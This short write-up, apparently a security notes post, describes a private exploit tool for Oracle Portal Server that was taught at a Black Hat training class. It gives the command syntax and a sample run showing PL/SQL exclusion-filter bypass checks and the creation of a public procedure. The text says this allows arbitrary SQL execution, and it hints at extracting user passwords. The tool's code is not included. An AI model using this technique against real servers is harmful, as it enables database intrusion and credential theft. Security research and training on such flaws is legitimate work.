This tool is basically a mini-exploit engine that specifically targets
Oracle Portal Server and will successfully break into any release
of Oracle including 10gR2 patched to CPU Jan 06. Due to certain
issues with Oracle patching it is also worth trying this tool on servers
patched with more current CPU's just in case certain elements of the
patch have not been applied or elements from future patches may have
re-opened a previously secured vulnerability. In essence the tool
tries to create a procedure and then grant execute to public.
After this has been successfully carried out it ties to exploit security
weaknesses in a number of in-built Oracle procedures.
I became aware of this tool after attending the Blackhat Breaking into
Oracle Server class given by David Litchfield of NGS Software.
At the time of writing this tool has not been publicly released and is only available to those people who take specific training at specialist NGS Software events i.e. Black Hat
C:\>breakable.exe host url [port] [v]
host ip_address of the Oracle Portal Server
url PATH_INFO i.e. /pls/orasso
port TCP port Oracle Portal Server is
serving pages from
C:\breakable 192.168.0.17 /pls/orasso 7777
Checking DIRECT HTP ACCESS............[FAILED]
Checking DIRECT OWA_UTIL ACCESS.......[FAILED]
Checking DIRECT DRILOAD ACCESS........[FAILED]
Checking NEWLINE EXCLUSION BYPASS.....[FAILED]
Checking LABEL EXCLUSION BYPASS.......[FAILED]
Checking BACKSLASH EXCLUSION BYPASS...[FAILED]
Checking QUOTE EXCLUSION BYPASS.......[FAILED]
Checking PARAM 1 EXCLUSION BYPASS.....[FAILED]
Checking PARAM 2 EXCLUSION BYPASS.....[FAILED]
Checking PARAM 3 EXCLUSION BYPASS.....[PASSED]
Checking PARAM 4 EXCLUSION BYPASS.....[PASSED]
Creating the procedure...[FAILED]
Server responded with 404; expected 200.
Creating the procedure...[PASSED]
Granting execute to public...[PASSED]
Creating public synonym...[PASSED]
Traversing to this link now gives you the option to supply single SQL
arguments that can be directly executed on the Oracle Portal Server:
Obviously the argument can be changed to also supply the passwords ;-)
The created procedure will also allow the use of concat statements to be
able in this case to concatenate the passwords with the associated user
account. Updates to the tool will be done in-house at NGS Software.